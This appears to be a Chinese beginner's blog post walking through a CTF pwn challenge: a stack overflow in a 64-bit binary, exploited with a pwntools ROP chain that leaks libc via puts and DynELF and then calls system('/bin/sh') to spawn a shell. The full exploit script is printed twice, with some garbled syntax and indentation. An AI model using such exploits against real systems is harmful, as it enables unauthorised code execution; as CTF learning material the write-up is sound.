萌新入坑——pwn(1)

最新推荐文章于 2025-07-17 03:09:36 发布
原创 最新推荐文章于 2025-07-17 03:09:36 发布 · 390 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

pwn100

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
read函数栈溢出,要写入200个字符,实际上栈没那么长

思路是 先用 leak 获取到 system地址 然后 找到libc基址,然后在库里面找到/bin/sh的字符串地址,然后调用system就好了
Dynelf找到system真实地址

#!/usr/bin/python
#coding:utf-8
 
from pwn import*
 
 
start_addr=0x400550
pop_rdi=0x400763
gadget1=0x40075a
gadget2=0x400740
binsh_addr=0x60107c
io=process("./pwn100")
elf=ELF("./pwn100")
 
puts_addr = elf.plt['puts']
read_got = elf.got['read']ef leak(addr):
	count=0
	up=''
	content=''
	payload='a'*72
	payload+=p64(pop_rdi)
	payload+=p64(addr)
        payload += p64(puts_addr)
	payload+=p64(start_addr)
	payload=payload.ljust(200,'a')
	io.send(payload)
	io.recvuntil("bye~\n")
	while True:
		c=io.recv(numb=1,timeout=0.1)
		count+=1
 
		if up == '\n' and c == "": 
			content=content[:-1]+'\x00'
			break				
		else:
			content+=c
			up=c
	content=content[:4]
        log.info("%#x => %s" % (addr, (content or '').encode('hex')))
	return content
 
 
 
d = DynELF(leak, elf = elf)
system_addr = d.lookup('system', 'libc')
log.info("system_addr = %#x", system_addr)

求libc基址和字符串位置
https://libc.blukat.me/?q=puts%3A690&l=libc6_2.23-0ubuntu11_amd64```
这个网址很好用

在这里插入图片描述

libc_base + offset = 真实地址

libc_base = system_addr - 0x045390
bin_addr = libc_base + 0x18cd57

**调用system,getshell**

payload = “A”*72
payload += p64(pop_rdi) #system("/bin/sh\x00")
payload += p64(bin_addr)
payload += p64(system_addr)
payload = payload.ljust(200, “B”)

io.send(payload)
io.interactive()

完整exp

#!/usr/bin/python
#coding:utf-8

from pwn import*

start_addr=0x400550
pop_rdi=0x400763
gadget1=0x40075a
gadget2=0x400740
binsh_addr=0x60107c

io=process("./pwn100")
elf=ELF("./pwn100")

puts_addr = elf.plt[‘puts’]
read_got = elf.got[‘read’]

def leak(addr):
count=0
up=’’
content=’’
payload=‘a’*72
payload+=p64(pop_rdi)
payload+=p64(addr)
payload += p64(puts_addr)
payload+=p64(start_addr)
payload=payload.ljust(200,‘a’)
io.send(payload)
io.recvuntil(“bye~\n”)
while True:
c=io.recv(numb=1,timeout=0.1)
count+=1

	if up == '\n' and c == "": 
		content=content[:-1]+'\x00'
		break				
	else:
		content+=c
		up=c
content=content[:4]
    log.info("%#x => %s" % (addr, (content or '').encode('hex')))
return content

d = DynELF(leak, elf = elf)
system_addr = d.lookup(‘system’, ‘libc’)
log.info(“system_addr = %#x”, system_addr)

libc_base = system_addr - 0x045390
bin_addr = libc_base + 0x18cd57

payload = “A”*72
payload += p64(pop_rdi) #system("/bin/sh\x00")
payload += p64(bin_addr)
payload += p64(system_addr)
payload = payload.ljust(200, “B”)

io.send(payload)
io.interactive()

![在这里插入图片描述](https://img-blog.csdnimg.cn/20190416105833236.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDMxOTE0Mg==,size_16,color_FFFFFF,t_70)
成了!准备换flag了嘻嘻嘻
栈溢出0x07 ret2libc3&Hijack GOT
砖家
10-04 1112
使用patchelf保证ret2libc3的实验结果一致性,先泄露函数地址后得到libc版本和加载基地址之后计算出system和/bin/sh的真实加载地址,从而getshell
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1628
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000
pwn的学习1
飞花的世界
12-26 379
考完研了。。考完选调生了。。现在坐等成绩。。闲得无聊的我。决定完成自己大三的时候的梦想,pwn。好吧,门就得有靶场吧,于是我选择了pwnable.pr 那么,首先是第一题。fd    首先是  ls   .发现有3个文件 fd,fd.c ,flag 然后vi查看文件 那么问题 就来了。。这个应该就是fd的源代码。。程序的过程是是输一个参数,然后 fd=参数-0x1234 ...
pwn ——ret2libc3
qq_41696518的博客
07-06 994
ret2libc3
ret2libc3_x86
最新发布
aksghj的博客
07-17 293
这里要进行两次溢出,第一次先用puts泄漏某个函数(这里是gets)的got地址,然后再用计算出的libc库偏移找到system和“/bin/sh”ret2libc3中,只有一个gets的溢出,system和“/bin/sh”都需要自己获取。实际题目中常常要用到LibcSearcher之类的小工具来寻找libc库版本。答案是动态链接库中的函数和字符串。先用gdb的vmmap找到库地址。与retlibc2保护相同。
pwn】基础ROP攻击实战:ret2libc3
ethan18的博客
07-10 599
这里用来记录一下关于PWN中ROP攻击的各种过程和经验ROP攻击是针对那些使用了NX防护的程序,开启NX防护的程序使得栈以及堆上的代码没有办法被执行,导致不能单独将函数栈中的返回地址修改到函数帧中。ROP主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。讲起来还是很抽象,我的理解就是利用了函数帧中的返回地址,以及具有gadgets(也就是带着ret指令的一段汇编语句)都算是ROP攻击。这里我挑一个最经典的ROP作为实战。
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 640
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进终端。进终端窗口输 nc ip 端口。点击进(也可以点击鼠标右键)题目给我们 nc ip 端口。
CTF——PWN——栈溢出(1.woof)
qq_45215609的博客
09-10 630
CTF——PWN——栈溢出(1.woof)
CTF——PWN——栈溢出(3.Easy_ShellCode)
qq_45215609的博客
09-18 874
CTF——PWN——栈溢出(3.Easy_ShellCode),bss段上的ret2shellcode
CTF——PWN——栈溢出(2.x64)
qq_45215609的博客
09-18 550
CTF——PWN——栈溢出(x64)
CTF——PWN——栈溢出(4.getshell)
qq_45215609的博客
09-19 456
CTF——PWN——栈溢出(4.getshell)
pwn学习-ret2libc3
Sa1nZen的博客
06-30 681
pwn学习-ret2libc3
好好说话之ret2libc3
hollk’s blog
06-22 1764
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc3 看一下C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, in...
ret2libc3
m0_49959202的博客
08-06 494
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2898
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
关于glibc-all-in-one缺失libc
hanabi_sh
12-05 1399
glibc-all-in-one中还缺少一些libc版本,当我们需要却没有的时候,就可以手动添加以下为2.23-0ubuntu11_amd64案例,发现并没有这个版本
溢出练习题pwn1
Elvira
08-26 5236
集训慢慢接近了尾声,樊荣学长给我们jian
XCTF Mary_Morton
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 533
原题出现在ASIS-CTF-Finals-2017 程序存在两个漏洞,一个格式化字符串漏洞,一个栈溢出漏洞 通过格式化字符串漏洞泄露canary的值,然后再构造payload,利用栈溢出漏洞获取flag canary的值是v2,因此得到canary在栈中的位置为第17位(0x88 / 8=17),又因为程序为64位程序,64位程序函数调用前6个参数通过寄存器传递,所以要加6,因此格式化字符为%2...
软件安全实验二——pwn
09-12
关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值